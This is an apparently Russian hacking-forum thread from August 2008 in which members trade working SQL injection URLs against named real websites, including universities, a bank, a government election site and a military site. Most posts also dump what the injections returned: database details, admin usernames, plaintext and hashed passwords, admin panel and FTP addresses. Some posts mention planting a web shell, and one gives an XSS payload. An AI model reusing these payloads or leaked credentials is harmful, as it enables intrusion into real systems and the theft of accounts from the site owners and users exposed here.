[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+phpbb_users/*
+)
http://www.superherohype.com/news/jamesbondnews.php?id=1+UNION+SELECT+concat_ws(0x3a ,version(),database(),user()),2/*
4.1.22:superher_nextra:superher_nextra@shh-n1-int
chroot/home/superher/superherohype.com/nextra/include/net/nexcess/lib/NexDbUtil.php(180): DB Error: syntax error SELECT user_id, name, email, password, title, access FROM NEX_USERS WHERE user_id =
Cennarios
14.08.2008, 09:43
http://microsoft.ugt.ge/index.php?id=1_1&blogid=-1+union+select+1,2,3,4,5,concat(username,0x3a3a,pa ssword),7+from+authenticate+limit+0,10
админка: http://microsoft.ugt.ge/admin/
login ->microsoft
pass->mic_admin$
Shadow_p1raT
14.08.2008, 10:36
Вот нашёл:
http://7c-rnd.ru/card.php?to=1&id=662'
Но не могу раскрутить,помогите горе хакеру.
S0ulVortex
14.08.2008, 12:30
Вот нашёл:
http://7c-rnd.ru/card.php?to=1&id=662'
Но не могу раскрутить,помогите горе хакеру.
http://7c-rnd.ru/card.php?to=1&id=662+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17+LIMIT+1,1--
Ну вот и все :)
Shadow_p1raT
14.08.2008, 12:43
http://7c-rnd.ru/card.php?to=1&id=662+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17+LIMIT+1,1--
Ну вот и все :)
большое спасибо,докапал дальше:
http://7c-rnd.ru/card.php?to=1&id=662+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13, %20%2014,15,16,concat_ws(0x3a,version(),user(),dat abase())+LIMIT+1,1--
base:crndru63_contine5
user:crndru63_contine@localhost
version:4.0.27-logк сожелению:(
Cennarios
14.08.2008, 12:44
http://www.istina.info/article.php?i=1'+union+select+1,concat(oprname,0x3 a3a,pwd,0x3a3a,prvLevel),3,4,5+from+church.church_ users+limit+0,10/*
Смотрим внутри:
Login: pavelyk
Pass: pasha
Админка: http://www.istina.info/admin
Cennarios
14.08.2008, 12:46
http://www.nodialawoffice.ge/lawyer_det.php?Id=-1+union+select+1,2,3,concat(username,0x3a3a,pass), 5,6,7+from+law_users--
login: admin
pass: barrabas
http://www.nodialawoffice.ge/admin
Залил шел.... =)
Shadow_p1raT
14.08.2008, 13:01
Вот есчё нашёл:
http://www.michaelpollan.com/article.php?id=-87+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10--
base:pollan_articles
user:pollan_article@localhost
version:4.1.22-standard опять не везёт.
http://www.metalmaremma.it/news.php?mod=news&lang=it&endpage=news&header=n&fullang=y&id=11[sql]
DBname: db_metalmaremma
Username: metalmaremma@womega.leonet.it
Version: 5.0.37-log
db_metalmaremma
db_cms
utenti
username:password
w4b:14asd03a
==================================================
http://www.cooptur.it/www/iseo_lakeiseo.php?territory=3&card=73[sql]
Version: 5.0.45
Uname: coopturi@localhost
Database: coopturi
strutture_login
terme:pwd1
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,version(),4,5,6,7/*
Jokester
14.08.2008, 14:38
Calcutta, если писать без ошибок, всё будет нормально :)
http://info.twtelecom.net/info.php?id=3+UNION+SELECT+1,concat_ws(0x3a,versio n(),database(),user()),3+LIMIT+1,1/*
Db Version: 5.0.22
Db name: info
User name: info@localhost
Calcutta
14.08.2008, 15:00
Ура -) jokester заставил меня включить мозг ^____^
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_login,admin_password),5,6,7+from+admins+limit+0 ,1--
Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:044e7b0ce67db55376abda253f52e101:1b
Tyre admin:tyre:c1d42f7311bfb28391292190c0a7a904:30
Disc admin:disk:10f43033d0b00ecccfc676bb6baa3f8e:64
Auto admin:auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:v.savosin:046a47fda9108dcc3cbd9d9ac0080a b6:84
hadmin:hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
http://www.dalea-products.co.uk/products.php?id=1+and+1=2+union+all+select+1
Database: daleaprod
User: daleaprod@213.171.218.94
Version: 5.0.27-log
[Table: Columns]
[0]announcements: id,title,text,datetime
[1]contactus: id,html,email
[2]dalea_users: id,username,password
[3]homepage: id,html
[4]productdata: sourceId,targetId,id,title,thumb,fullsize,caption
[5]products: id
Ура -) jokester заставил меня включить мозг ^____^
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_login,admin_password),5,6,7+from+admins+limit+0 ,1--
Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:044e7b0ce67db55376abda253f52e101:1b
Tyre admin:tyre:c1d42f7311bfb28391292190c0a7a904:30
Disc admin:disk:10f43033d0b00ecccfc676bb6baa3f8e:64
Auto admin:auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:v.savosin:046a47fda9108dcc3cbd9d9ac0080a b6:84
hadmin:hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
ну вы люди даете :D
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,3,column_name,5,6,7+from+inform ation_schem.columns+where+table_name=0x61646d696e7 3--
таблица "admins"...
а какая была надежда, но ...
SELECT command denied to user 'koleso_ktopof'@'localhost' for table 'columns'
Все тут крутиться!!!Я давно крутил....
news:newsmaker
auto:avtotop
http://koleso.topof.ru/testing_info.php?id=-1+union+select+1,2,concat_ws(0x3a,admin_name,admin _id,admin_type,admin_login,admin_password),4,5,6,7 +from+admins
проще некуда
Art-Ge-Force
14.08.2008, 18:54
http://www.ngo.acssc.kg/news_rash.php?ify_id=-1+UNION+SELECT+2,2,3,4,User(),6,database(),8,9,10, 11
http://job.312.kg/infoall.php?recordID=-1+UNION+SELECT+1,user(),version(),database(),passw ord,8,7,8,9,email,11,name,13,14,15+from+users+limi t+0,1/*
:P
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
S0ulVortex
14.08.2008, 22:28
http://www.feodosia.orthodoxy.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,ver sion(),database(),user()),4,5/*
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4
5
http://www.dilian.net/fun.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,v ersion(),database(),user()),3,4%20LIMIT%201,1/*
4.1.22-log:dilian:dilian@localhost
http://www.antijob.ru/
http://www.antijob.ru/reviews/add/opinion/?company_id=-1094+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
Версия 5.0.22.
http://www.antijob.ru/reviews/add/opinion/?company_id=-1094+union+select+1,2,concat(user_id,0x3a,login,0x 3a,name,0x3a,password,0x3a,email),4,5,6,7,8,9,10,1 1+from+users+limit+1,1/*
2:antijob:Администратор:0dfa1ead51ae2 ecd943fed0018036109:info@antijob.ru
Расшифровал пароль: ljrnjhpkj
Но в админку так и не попал(((( help
Админка: http://www.antijob.ru:2222/
Cennarios
15.08.2008, 05:36
http://www.klipfolio.com/index.php?action=explore,listing&by=set&sid=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,conve rt(login+using+utf8),0x3a3a,password),10,11,12,13, 14,15,16,17+from+kf_user+limit+0,20/*
Цэ юзеры сайта: awille::wetn00dle
http://www.klipfolio.com/index.php?action=explore,listing&by=set&sid=-1+union+select+1,2,3,4,5,6,7,8,concat(unhex(hex(us ername)),unhex(hex(0x3a3a)),unhex(hex(user_passwor d))),10,11,12,13,14,15,16,17+from+phpbb_users+limi t+1,10/*
Цэ эзеры форума.
Calcutta
15.08.2008, 08:24
http://presa.ge/index.php?text=news&i=-343111+union+select+1,2,concat_ws(0x3a,id,user_use rname,user_password,user_email,user_firstname,user _lastname),4,5,6,7,8,9,10,11+from+users+limit+0,1--
presa.ge:c1ab283404b71a940807009023a764bd
<3 грузинскую прессу -)
to tor4)
Какая нафик админка :D , ето страница авторизации в DirectAdmin :lol:
Cennarios
15.08.2008, 11:43
http://www.chca.org.ge/index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,conc at(name,0x3a3a,pass),11,12,13,14,15,16,17,18,19,20 ,21,22+from+na_users+limit+0,1
login: admin pass: admin
http://intelt.com/spb/hotel/?id=-1+union+select+1,2,3,4,5/*
http://www.vadimmusic.com/fiche.php?id=-183+union+select+1,2,3,4,concat(admin_login,0x3a,a dmin_pass),6,7,8,9,10,11,12+from+compteadmin/*
http://www.goelette.ca/site.php?detail=84[sql]
Version:5.0.22-standard
Dbname:goelette_main
User:goelette_main@localhost
ничего интересного почемут(
http://www.bsn.org.uk/script.php?id=1%20UNION%20SELECT%201,2,3,concat_ws (0x3a,version(),database(),user()),5,6,7,8/*
4.1.20:satelite_news:satelite_news@localhost
http://www.lib.walla.ru/
http://www.lib.walla.ru/?cat_id=-1+order+by+1,2,3,4,5,6 --
Версию не показывает но 5-ая, потомучто по одному ip c http://www.antijob.ru/
Ладно.
login: bob
pass: vova123
Входишь под админом, а админка скидывает на index Хрень)
S0ulVortex
16.08.2008, 13:51
http://www.e-light.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://www.lavina.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://www.angeldent.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://vesnabrand.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
Админка для всех этих сайтов
www.as-admin.com/index.php
http://www.innisfil.ca/calendar/index.php?id=327[SQL]&action=SE
Dbname:TownWWW
Version:4.0.18-standard
User:townsql@10.10.17.9
mysql.user
root:617cc18f2733a3b1
ibdusr:1a393d956e785b2d
admin3:04c0e94c36430bdf
admin:6d0089a5205f3116
sql-server в локалке ((
Shaitan-Devil
16.08.2008, 15:17
Багу пофиксели но может кто скажет почему было так
ttp://www.results.cec.gov.ge//major_olq.php?district=1+or+1=(SELECT+TOP+1+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+where+table_na me+not+in+(char(111)+char(108)+char(113)+char(101) +char(98))))-- Выводилась ошибка
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'char'. (severity 15) in /www/html/shedegebi2008parl/major_olq.php on line 14 Вопрос почему?
Shaitan-Devil, это было потому, что у тебя шли функции char, разделенные пробелами, вот так:
(char(111)+char(108)+char(113)+char(101) +char(98))
Т.к. + здесь будет идти как пробел. А синтаксис SQL это не понимает. Надо было юзать такую конструкцию:
char(111,108,113,101,98)
Shaitan-Devil
16.08.2008, 15:36
Shaitan-Devil, это было потому, что у тебя шли функции char, разделенные пробелами, вот так:
(char(111)+char(108)+char(113)+char(101) +char(98))
Т.к. + здесь будет идти как пробел. А синтаксис SQL это не понимает. Надо было юзать такую конструкцию:
char(111,108,113,101,98)
Разве такая конструкция для МССКЛ а подойдет?Мне казалось это тока стандарт АНСИ
Jokester
16.08.2008, 16:04
Разве такая конструкция для МССКЛ а подойдет?Мне казалось это тока стандарт АНСИ
Правильно тебе казалось, надо было + заменить на %2B, тоесть так:
where+table_name+not+in+(char(111)%2Bchar(108)%2Bc har(113)%2Bchar(101)%2Bchar(98))))--
А эта конструкция char(111,108,113,101,98) работать на MSSQL не будет
А ещё лучше Hex
Shaitan-Devil
16.08.2008, 16:16
А ещё лучше Hex
В том случае HEX не подходил я уже пробовал
Cennarios
16.08.2008, 16:58
http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat(username,0x3a3a,passwo rd),5,6,7,8,9,10,11,12,13,14,16+from+sinfonie_user +limit+1,10/*
login: ice
password: xferrari
http://www.sinfonie-hausverwaltung.de/admin
http://www.womennet.ca/directory.php?browse&999
http://www.womennet.ca/directory.php?browse&1
какая то скуля,как мне кажется..мне такая еще не встречалась. кто попробует крутнуть?)
S0ulVortex
16.08.2008, 20:33
http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex')</script>
это не скуля это xss помойму
Photohost.ru
http://www.photohost.ru/forum.php?action=viewtopic&topicid=-1+union+select+table_name+from+information_schema. tables+limit+16,1/*
Kinomob.info
http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
Gpb.ge
http://www.gpb.ge/moambe_news.php?lang=geo&tm_id=-1&news_id=-13712+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12+from+information_schema.tables+limit+16,1/*
5 ver. tables
http://www.gpb.ge/moambe_news.php&lang=eng&tm_id=-1&news_id=-13712+union+select+1,2,concat_ws(0x3a,username,pas sword),4,5,6,7,8,9,10,11,12+from+eurovision.authen ticate/*
/admin
Photodom.com
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1,1)=5/*
Shadeaux.net
http://www.shadeaux.net/hosting/detailspak.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*
Hiveprojects.com.au
http://www.hiveprojects.com.au/artist_page.php?id=-1+union+select+1,2,3,4,5,6,7,version(),9,10/*
Bpjt.net
http://www.bpjt.net/index.php?id=null%20union%20all%20select%201,versi on(),3,4,5--
S-dir.net.ua
http://www.s-dir.net.ua/cat/select.php?f_id=-26+union+select+1,2,table_name,4,5,6,7,8,9,10,11+f rom+information_schema.tables/*
Tniad.mil.id
http://www.tniad.mil.id/news.php?id=-2998+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13/*
http://www.krabbelnu.com/categorie.php?cat=99999999+union+select+version()/*
version(): 5.0.38-Ubuntu_0ubuntu1.4-log
database(): 22928krabb
user(): 22928krabb@10.0.1.69
в БД 2 таблицы : krabbel_plaatjes и links
krabbel_plaatjes:
plaatje_id
plaatje_url
plaatje_cat
links
id
titel
url
important
dik
Shaitan-Devil
16.08.2008, 22:53
http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex')</script>
это не скуля это xss помойму
Нет там не Хсс 90%.Где-то я такое втречал,имхо нужен посимвольный.
Jokester
16.08.2008, 23:08
Нет там не Хсс 90%.Где-то я такое втречал,имхо нужен посимвольный.
http://www.womennet.ca/directory.php?browse&1/**/union/**/select/**/1,version(),3,4,5/*
PS И давай на будующее, вопросы в соседнюю тему
какой-то банк
http://www.fibank.al/index.php?language=-1/**/union/**/select/**/1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17/*
Database: website
User: webmaster@localhost
Version: 5.0.32-Debian_7etch6-log
Table: Columns]
[0]admins: ID,username,password
[1]contents: ID,menuID,priority,typeID,c1,c2,c3,c4,c5,c6,c7,c8, c9,c10,fileext,showonweb,preview
[2]dropdown: ID,name_1,name_38,tablename,priority,name_
[3]errors: ID,name_1,name_38
[4]feedbackform: ID,fieldname,fieldtype,name_1,name_38,name_81
[5]feedbacks: company,name,office,phone,fax,email,subject,answer ,content,ID,recorddate
[6]forms: ID,name_1,name_38,fieldname,fieldtype,comment_1,co mment_38,formname
[7]menus: ID,parent,name,priority,showonweb,preview
[8]offices: ID,email,name_1,name_38,name_81
[9]ordercalc: ID,name_1,name_38
[10]orders: ID,office,volume,slanguage,tlanguage,theme,qtime,q uantity,correction,professional,delivery,model,mod elother,storage,format,formatother,payment,notes,s ubmited,datep,duration,address,technics,uploadfile
[11]prices: ID,slanguageID,tlanguageID,priceperpage,priceperwo rd,priceperhour,priceperhoursim
[12]qcountries: ID,q,name_1,name_38
[13]qtimes: ID,name_1,q,name_38
[14]types: ID,Name,Description,c1,c2,c3,c4,c1type,c2type,c3ty pe,c4type,fileext,hasimage,c5,c6,c7,c8,c9,c10,c5ty pe,c6type,c7type,c8type,c9type,c10type,image1,imag e2,image3,image4,image5,image6,image7,image8,image 9,image10,priority
[15]users: username
Cennarios
17.08.2008, 03:07
Какая-то америкосовская научная муть...
http://www.testzentrale.de/?mod=detail&id=1'+union+select+1,concat(0x3a3a,unhex(hex(usern ame)),0x3a3a,unhex(hex(password))),3,4,5,6+from+_v erwaltung.tbl_user+limit+1,3/*
http://www.hogrefe.com/index.php?mod=login
Login:schuler@uni-hohenheim.de pass:ZeUs
Cennarios
17.08.2008, 03:24
http://www.bueroschnaeppchen.de/shop/seller.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a3a,pas sword),8+from+users+limit+1,10/*
login: nmb pass: 37f2123f20176519<-хз что
http://www.autoexotica.ru/news/?nid=130'
http://www.safin.com/index.php?c=england&t=3'&cat=3'&subcat=16'
http://www.autoexotica.ru/news/?nid=130'
http://www.autoexotica.ru/news/?nid=130+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1/*
Там стоит IPB
PS: Поробуй почитай фак по скулям и раскрути
truelamer
17.08.2008, 07:02
http://medcenter.kz/?mid=-1+union+select+1,concat(name,char(13),pass),3,4,5, 6,7,8,9+from+users+limit+1,1--
login: mcadmin
pass: ordamed.kz
http://www.espacejavascript.com/script.php?id=1%20UNION%20SELECT%201,concat_ws(0x3 a,version(),database(),user()),3,4/*
5.0.44-log:espaceja:espaceja@10.0.75.154
Вот такой вот БОЛТ ))
http://bolt.lakeheadu.ca/~educate/wp/?pg=-47
Version: 4.1.21-standard-log
Dbname: education
Username: educate@localhost
news
phpbb_users линка: forum/
courses
http://www.iqc.ca/activities/courses/course_details_new.php?id=-51
Version: 5.0.18-nt
Dbname: iqc
Username: web@iqc4.math.uwaterloo.ca
ничего про юзеров((
==============================
PR-4
http://www.nakuspmusicfest.ca/news.php?id=65
фест какой то..виндовый хостинг.
Username:nakusp@localhost
Database:nakusp
Version:5.0.45-community-nt
Shaitan-Devil
17.08.2008, 13:46
Довел инъекцию Fugitif.
http://www.espacejavascript.com/script.php?id=-1'
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/*
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6
+from+infomation_schema.tables/*
Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass.
login: G1Script
pass:931af583573227f0220bc568c65ce104
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
ничего полезного кроме мыл не нашел
ALL4HOSTING
http://www.all4hosting.ru/
таблы
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('Content','D99_CMD','D99_Tmp','dtproperties', 'foob','forum_data','forum_mails','forum_theme','f orum_title','idClient','kill_kk','Links','Log','Ma iler','Menu','Meta','MetaLinks','News','property', 'sysconstraints','syssegments','t','t_jiaozhu','te 222','TreeList_Tmp'))--
Более менее интересной показалась idClient
Но там всего два юзера, и то западло какоето:
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+COLUMN_NAME+ FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=' idClient'+AND+COLUMN_NAME+NOT+IN+('idClient','logi n','pass','ip'))--
+
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+login+FROM+i dClient)--
system_user:allforhosting
@@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name():allforhosting
http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/*
version 4.0.16
http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user( ),8,9,0/*
version: MYSQL 4.1.22-standard
database: pollan_articles
user: pollan_article@localhost
Palit.biz
http://www.palit.biz/main/vgapro.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,version()+limit+1,1/*
Combined.biz
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6+from+mysql.user--
Plusline.org
http://www.plusline.org/article.php?id=99999+union+select+unhex(hex(versio n()))/*
Talk.biz
http://www.talk.biz/talk/cities.php?id=-1'+union+select+1,2,3,version(),5,6/*
Cyberthing.net
http://www.cyberthing.net/video-play.php?id=-1+union+select+1,concat_ws(0x3a,table_name),3,4,5, 6,7+from+information_schema.tables
Interprice.biz
http://interprice.biz/pricelist.php?cat=1&fcountry=&fregion=&fcity=&fupdated=0&ftitle=99999999999%27+union+select+1,unhex(hex(ver sion())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25/*
Ransomes-jacobsen.biz
http://www.ransomes-jacobsen.biz/rjl_website/product_details.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*
Talant.biz
http://www.talant.biz/news.php?id=-1'+union+select+1,2,3,unhex(hex(version())),5,6,7, 8,9,10/*
3 ver. by vital & jokester
http://www.saldovo-divadlo.cz/page.php?id=4+and+substring(version(),1,1)=3/*
http://www.host.ie/testimonials.php?id=8+and+substring(version(),1,1) =3/*
http://www.places.ge/GEO/sightseeings.php?id=2'+and+substring(version(),1,1 )=3/*
http://news.udaff.com
POST-инъект
http://news.udaff.com/index.php
cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,pas sword),3+from+USERS+limit+0,1/*
inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga
ЛифчиС5СВ
18.08.2008, 02:18
Немного о вине =)
http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user ,password),3,4,5,6,7,8+from+admintable/*
Табличку не подобрал =)
Cennarios
18.08.2008, 04:30
Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.
Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...
http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам
osas:::Z5ESqlRtTrt7Y
anatomka:::Pgwl.XrN4bs1o
phosas:::KGt4CWj1zvBWc
osasod:::JO96GZfMHu0BU
adminweb:::MEDINedu
sopott:::M.NEksFkXBxfk
admfoto::WJc7OVOTQRkFs
userfoto::RsRvTv93
biophys:::gjtqJLxY0FDrM
ftp://217.146.249.35 <-тыкаем сюда
--------------------------------
пример: login: biophys pass: gjtqJLxY0FDrM
http://www.biophys.odmu.od.ua/
login: adminweb pass: MEDINedu
ftp://www.odmu.edu.ua/
http://www.odmu.edu.ua/_.php <-админка
Пароль: k.,bvfz ie,rf
С помощью шела путешествуем по серверу на котором висит все это чудо.
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,ver sion(),database(),user()),4,5/*
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4
5
_Pantera_
18.08.2008, 11:22
http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58), table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables +limit+17,1/*
Cennarios
18.08.2008, 13:12
Академия Наса.. )))
http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>',middlename,0x3a3a,login,0x3a3a,password,0x3a3a,p assword_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*
Выборка по юзерам.
http://www.nasa-academy.org/db/login.php аутентификация
Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?
К тому же походу file_priv разрешены, но пути х** нарыл...
www.mirtravel.comhttp://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_nam e)+FROM+information_schema.columns/*
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/* mir:4b53ed9250ece8ed
admin:e1eba9bbbb04da14e0f0b1cec9eea708:zzz123
Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/ :confused:
http://www.grand-elizaveta.ru/otziv/?action=showreplies&fid=1&topic=1&start=-1
Народ похоже на order by незнаю как раскрутить :) 1 рас встречаюсь стакой
Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.
http://www.aei-brookings.org/events/page.php?id=-152+union+select+1,2,version()/*
version: 4.0.25-standard-log
database: aei_brooking
user: aei_brookings@10.225.135.70
http://aviation-safety.net/wikibase/wiki.php?id=-16509+union+select+1,version(),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2/*
version:mysql-s-22-4.1. ???
http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,5,version()/*
version: MySQL 4.0.16
http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,TABLE_SCHEMA,COLUMN_NAME, 8,9,0,1,2,3,4,5,6,7,8,9+from+information_schema.CO LUMNS+WHERE+TABLE_NAME=%22users%22+limit+26,1/*
version: MySQL 5.0.27-standard
http://www.coinsportal.ru/Bibliotheka/Article.php?ID=-1+union+select+1,2,version(),4,5/*
version:MySQL 4.0.18
http://www.roguegovernment.com/news.php?id=9770+union+select+1,version(),3,4,5,6, 7,8,9,0/*
версия:mysql4.1.22-standard
выод между тегами title
PR: 5
Calcutta
19.08.2008, 09:49
http://www.vdv.gcg.ru/forum/index.php?id=-2304+union+select+concat_ws(0x3a,version(),user(), database())--
http://www.iclogic.com/catalogue/organisations/showorg.php?id=-1372+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
edited: http://www.aktem.ru/frame.php?action=book&ID=-1111+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8--
Версии 4.*
Супермаркет уникального контента Textsale.ru:
http://www.textsale.ru/u-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*.html
http://www.textsale.ru/canu-1+union+select+1,2,version(),4,5/*.html
Путь:/home/l/loveumru/public_html/textsale/public_html/
Больше ничего узнать не удается, т.к. хостер фильтрует 'from'.
http://www.nottingham.ac.uk/library/library-sites.php?id=8+UNION+SELECT+concat_ws(0x3a,version (),database(),user()),2,3,4,5,6,7,8+LIMIT+1,1/*
4.0.20-max-log:ulzljw_faqdb:ulzljw_www@portal1.is.nottingham. ac.uk
8
http://www.danwessonfirearms.com/product_detail.php?id=-48+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6/*
verion:4.0.21-standard
http://www.phpbuddy.com/article.php?id=-8+union+select+version(),2,3,4,5,6/*
version: 4.1.21-standard
iron-viper
19.08.2008, 19:14
http://diccionari-triat.com/rutinas.php?funcion=guardar&palabra=
Вот что-то если не то, не бейте, сам не сог расковырять, если получиться выложите, интересно глянуть
S0ulVortex
19.08.2008, 20:28
http://rubin-stomatology.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,pass word,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
админка
http://rubin-stomatology.ru/administrator
http://www.toolsupplies.co.uk/product_desc.php?id=875%20union%20select%20admin_p assword%20from%20admin/**
http://www.krippenbauer.eu/tsnews4/news.php?tsnews4=comment&newsid=1%20UNION%20SELECT%201,2,concat_ws(0x3a,ver sion(),database(),user()),4,5,6/*
4 5 schrieb am 01.01.1970, 01:00
4.0.15:krippenbauer:krippenbauer@localhost
Cennarios
20.08.2008, 04:25
http://www.prokit.co.uk/product.php?id=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8+from+prokit_users/*
login:admin pass:8b36e28c44fcf9daacf25a877c530afc
_______________________________
http://www.ecitb.org.uk/administrator/index.php
http://www.ecitb.org.uk/modules/getoffice.php?office=-1+union+select+1,2,3,concat(username,0x3a3a,passwo rd),5,6,7,8,9,10,11,12,13+from+jos_users+limit+0,1 0/*
login:admin pass:cd9886f99d2337810ca3f22d5c6d9490:QFo41WOzVM1M T6YU
Наконец-то вернулся домой, отдохнул прекрасно. Тэкс, теперь за дело:
mobilgamez.ru
